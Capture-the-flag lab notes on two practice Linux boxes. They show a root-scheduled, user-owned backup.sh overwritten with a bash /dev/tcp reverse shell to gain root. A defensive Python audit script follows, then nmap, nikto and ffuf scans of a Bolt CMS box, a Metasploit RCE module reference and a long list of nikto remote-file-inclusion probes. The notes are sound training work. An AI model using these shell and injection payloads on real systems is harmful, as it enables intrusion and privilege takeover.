systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
grimmie:x:1000:1000:administrator,,,:/home/grimmie:/bin/bash
- Open a new terminal tab and connect with `ssh [email protected]`.
- Download linpeas again and check if something has changed.
- `cd /home/grimmie`, where we see `backup.sh`:
cat /home/grimmie/backup.sh
#!/bin/bash
rm /tmp/backup.zip
zip -r /tmp/backup.zip /var/www/html/academy/includes
chmod 700 /tmp/backup.zip
- Periodic backup, but no cron info when running `crontab -l` or `systemctl list-timers`.
- https://github.com/DominicBreuker/pspy: download the 64-bit static version, go back to /tmp and wget the file.
- Now we can see all the processes, and we see backup.sh: it's running every minute (as root, since the script is not ours to schedule).
- From https://github.com/cwinfosec/pentestmonkey/blob/master/Reverse_Shell_Cheat_Sheet.md, take `bash -i >& /dev/tcp/192.168.92.128/8081 0>&1`; open `nc -nvlp 8081`, then `nano /home/grimmie/backup.sh` and paste `bash -i >& /dev/tcp/192.168.92.128/8081 0>&1`. The next scheduled run connects back:
bash-5.0# whoami
root
bash-5.0# ls
backup.sh backup.sh.save
bash-5.0# cd /root
bash-5.0# ls
flag.txt
bash-5.0# cat flag.txt
Congratz you rooted this box !
Looks like this CMS isn't so secure...
I hope you enjoyed it.
If you had any issue please let us know in the course discord.
Happy hacking !
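The weakness used above is a script that root launches every minute but that a non-root user (grimmie) owns. The following Python audit helper is an added example, not part of these notes, linpeas or pspy: it parses ls -l style lines like the ones linpeas prints and cross-checks them against the paths root was seen launching. Only the first two inventory lines come from the output above; the other entries, the root-executed list and the trusted-principal sets are constructed assumptions.

```python
# Audit helper: which scripts that root executes could a non-root user change?
# Parses ls -l style lines (the format linpeas prints) into an inventory and
# cross-checks it against scripts root was seen launching on a schedule.
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# ls -l / linpeas line: perms links owner group size month day year|time path [trailer]
LS_LINE = re.compile(
    r"^(?P<ftype>[-dl])(?P<perms>[rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\S+\s+\S+\s+\S+\s+\S+\s+(?P<path>/\S+)"
)
TRUSTED_USERS = {"root"}   # assumption: write access by these is not a boundary crossing
TRUSTED_GROUPS = {"root"}

@dataclass(frozen=True)
class FileEntry:
    path: str
    is_dir: bool
    owner: str
    group: str
    perms: str  # nine characters, e.g. "rwxr-xr--"

    @property
    def group_writable(self) -> bool:
        return self.perms[4] == "w"

    @property
    def world_writable(self) -> bool:
        return self.perms[7] == "w"

def parse_ls_line(line: str) -> Optional[FileEntry]:
    """Parse one ls -l style line; return None for headers and other noise."""
    m = LS_LINE.match(line.strip())
    if not m:
        return None
    return FileEntry(path=m["path"], is_dir=m["ftype"] == "d",
                     owner=m["owner"], group=m["group"], perms=m["perms"])

def modifiable_by_non_root(entry: FileEntry) -> List[str]:
    """Reasons a principal other than root can change this entry."""
    reasons = []
    if entry.owner not in TRUSTED_USERS:
        reasons.append(f"owned by {entry.owner}")  # an owner can always chmod and write
    if entry.group_writable and entry.group not in TRUSTED_GROUPS:
        reasons.append(f"group-writable by {entry.group}")
    if entry.world_writable:
        reasons.append("world-writable")
    return reasons

def replaceable_via_parent(path: str, inventory: Dict[str, FileEntry]) -> List[str]:
    """A modifiable parent directory lets a user rename or swap the file itself."""
    reasons = []
    parent = path.rsplit("/", 1)[0]
    while parent:
        d = inventory.get(parent)
        if d is not None and d.is_dir:
            for why in modifiable_by_non_root(d):
                if why == "world-writable" and d.perms[8] in "tT":
                    continue  # sticky /tmp-style dir: others cannot unlink files they do not own
                reasons.append(f"parent {parent} is {why}")
        parent = parent.rsplit("/", 1)[0]
    return reasons

def audit_root_executed(ls_lines: Iterable[str],
                        root_executed: Iterable[str]) -> Dict[str, List[str]]:
    """Map each root-executed path to the reasons a lesser user could alter it."""
    inventory = {e.path: e for e in map(parse_ls_line, ls_lines) if e is not None}
    findings: Dict[str, List[str]] = {}
    for path in root_executed:
        entry = inventory.get(path)
        if entry is None:
            continue  # not in the inventory, nothing to judge
        reasons = modifiable_by_non_root(entry) + replaceable_via_parent(path, inventory)
        if reasons:
            findings[path] = reasons
    return findings

# Constructed inventory: the first two lines are copied from the linpeas output
# of this box; the rest are made up to exercise the directory and group checks.
SAMPLE_LS = [
    "-rwxr-xr-- 1 grimmie administrator 112 May 30 2021 /home/grimmie/backup.sh",
    "-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)",
    "drwxr-xr-x 2 root root 4096 May 29 2021 /etc/cron.hourly",
    "-rwxr-xr-x 1 root root 210 May 29 2021 /etc/cron.hourly/rotate-logs",
    "drwxrwxr-x 2 root developers 4096 May 29 2021 /opt/deploy",
    "-rwxr-xr-x 1 root root 300 May 29 2021 /opt/deploy/deploy.sh",
    "drwxrwxrwt 10 root root 4096 Jul 23 04:50 /tmp",
    "-rwxr-xr-x 1 root root 88 Jul 23 04:50 /tmp/cleanup.sh",
]
# Constructed: paths a pspy capture showed root launching from a timer.
ROOT_EXECUTED = ["/home/grimmie/backup.sh", "/etc/cron.hourly/rotate-logs",
                 "/opt/deploy/deploy.sh", "/tmp/cleanup.sh"]
```

Running `audit_root_executed(SAMPLE_LS, ROOT_EXECUTED)` flags backup.sh (owned by grimmie) and deploy.sh (its parent is group-writable), while the root-owned script in sticky /tmp and the cron.hourly one pass.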
- 1 GB of memory is enough, NAT for network.
- Log in with root:tcm.
- `dhclient`, then `ip a`.
nmap -T4 -p- -A 192.168.92.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-24 01:45 EDT
Nmap scan report for 192.168.92.132
Host is up (0.00081s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 bd:96:ec:08:2f:b1:ea:06:ca:fc:46:8a:7e:8a:e3:55 (RSA)
| 256 56:32:3b:9f:48:2d:e0:7e:1b:df:20:f8:03:60:56:5e (ECDSA)
|_ 256 95:dd:20:ee:6f:01:b6:e1:43:2e:3c:f4:38:03:5b:36 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Bolt - Installation error
|_http-server-header: Apache/2.4.38 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 34727/tcp mountd
| 100005 1,2,3 36963/tcp6 mountd
| 100005 1,2,3 57403/udp6 mountd
| 100005 1,2,3 57496/udp mountd
| 100021 1,3,4 33795/tcp6 nlockmgr
| 100021 1,3,4 35248/udp6 nlockmgr
| 100021 1,3,4 37691/tcp nlockmgr
| 100021 1,3,4 49804/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs 3-4 (RPC #100003)
8080/tcp open http Apache httpd 2.4.38 ((Debian))
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: PHP 7.3.27-1~deb10u1 - phpinfo()
34727/tcp open mountd 1-3 (RPC #100005)
37691/tcp open nlockmgr 1-4 (RPC #100021)
38093/tcp open mountd 1-3 (RPC #100005)
42299/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:B6:36:DD (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.81 ms 192.168.92.132
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.79 seconds
Notes
80 - info disclosure - installation error bolt
404 - info disclosure - Apache/2.4.38 (Debian)
app/nut - Symfony, wrong php version
README.md - Bolt Installer for Composer
composer.json - Bolt 3.7, passwordlib
Bolt CMS 3.7.0 - Authenticated Remote Code Execution
msf > use exploit/unix/webapp/bolt_authenticated_rce
BoltWire 6.03 - Local File Inclusion
8080 - info disclosure - PHP Version 7.3.27-1~deb10u1 - Linux dev 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
8080/dev/ - website with default boltwire page
nikto -h http://192.168.92.132
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.92.132
+ Target Hostname: 192.168.92.132
+ Target Port: 80
+ Start Time: 2024-07-24 01:58:01 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /app/: Directory indexing found.
+ /app/: This might be interesting.
+ /public/: Uncommon header 'x-debug-token' found, with contents: 73d5d0.
+ /src/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /composer.json: PHP Composer configuration file reveals configuration information. See: https://getcomposer.org/
+ /composer.lock: PHP Composer configuration file reveals configuration information. See: https://getcomposer.org/
+ /.gitignore: .gitignore file found. It is possible to grasp the directory structure.
+ /README.md: Readme Found.
+ 8102 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2024-07-24 01:58:23 (GMT-4) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.92.132/FUZZ
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.92.132/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 23ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 27ms]
# Copyright 2007 James Fisher [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 27ms]
# [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 4ms]
# [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 35ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 30ms]
public [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 2ms]
# [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 344ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 357ms]
# [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 366ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 374ms]
# directory-list-2.3-medium.txt [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 390ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 631ms]
[Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 638ms]
# on atleast 2 different hosts [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 706ms]
src [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 1ms]
app [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 17ms]
vendor [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 2ms]
extensions [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 2ms]
[Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 791ms]
server-status [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 4ms]
:: Progress: [220560/220560] :: Job [1/1] :: 1724 req/sec :: Duration: [0:00:34] :: Errors: 0 ::
nikto -h http://192.168.92.132:8080
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.92.132
+ Target Hostname: 192.168.92.132
+ Target Port: 8080
+ Start Time: 2024-07-24 01:59:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Output from the phpinfo() function was found.
+ /index.php: Output from the phpinfo() function was found.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ /./: Output from the phpinfo() function was found.
+ /index.php/123: Output from the phpinfo() function was found.
+ //: Output from the phpinfo() function was found.
+ /%2e/: Output from the phpinfo() function was found.
+ /index.php/\"><script><script>alert(document.cookie)</script><: Output from the phpinfo() function was found.
+ /index.php/content/search/: Output from the phpinfo() function was found.
+ /index.php/content/advancedsearch/: Output from the phpinfo() function was found.
+ ///: Output from the phpinfo() function was found.
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /dev/: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /index.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Output from the phpinfo() function was found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /?_CONFIG[files][functions_page]=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /?npage=-1&content_dir=http://blog.cirt.net/rfiinc.txt%00&cmd=ls: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /?npage=1&content_dir=http://blog.cirt.net/rfiinc.txt%00&cmd=ls: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /?show=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?1=lol&PAGES[lol]=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?AML_opensite=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?AMV_openconfig=1&AMV_serverpath=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?CONFIG[MWCHAT_Libs]=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?ConfigDir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?DIR_PLUGINS=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?G_JGALL[inc_path]=http://blog.cirt.net/rfiinc.txt%00: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?HomeDir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?Lang=AR&Page=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?Madoa=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?RP_PATH=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?abg_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?abs_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?abs_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?adduser=true&lang=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?adodb=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?ads_file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?arquivo=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?back=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?base==http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?basePath=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?bibtexrootrel=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?blog_dc_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?blog_theme=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?body=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?class_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?classified_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?cms=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?config[\"sipssys\"]=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?config[root_ordner]=http://blog.cirt.net/rfiinc.txt?&cmd=id: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?config[root_ordner]=http://blog.cirt.net/rfiinc.txt?cmd=id: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?config_atkroot=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?configuration=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?custom_admin_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?dateiPfad=http://blog.cirt.net/rfiinc.txt?&cmd=ls: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?de=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?dept=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?do=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?exec=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?ext=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?faq_path=http://blog.cirt.net/rfiinc.txt?&cmd=id: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?file_name[]=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?file_Nikto[]=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?file_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?fileloc=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?from=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?func=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?function=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?function=custom&custom=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?gOo=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?gen=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?get=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?home_name=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?home_Nikto=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?ilang=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?inc_dir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?inc_dir=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?includeDir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?includeFooter=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?includesdir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?insPath=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?lang=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?language=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?language=en&main_page=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?lizge=http://blog.cirt.net/rfiinc.txt?&cmd=ls: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?lng=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?load=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?loadpage=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?main_tabid=1&main_content=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?may=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?middle=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?mode=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?mode=http://blog.cirt.net/rfiinc.txt?&cmd=: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?modpath=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?module=PostWrap&page=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?mosConfig_absolute_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?news7[\"functions\"]=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?news_include_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?open=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?option=com_custompages&cpage=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
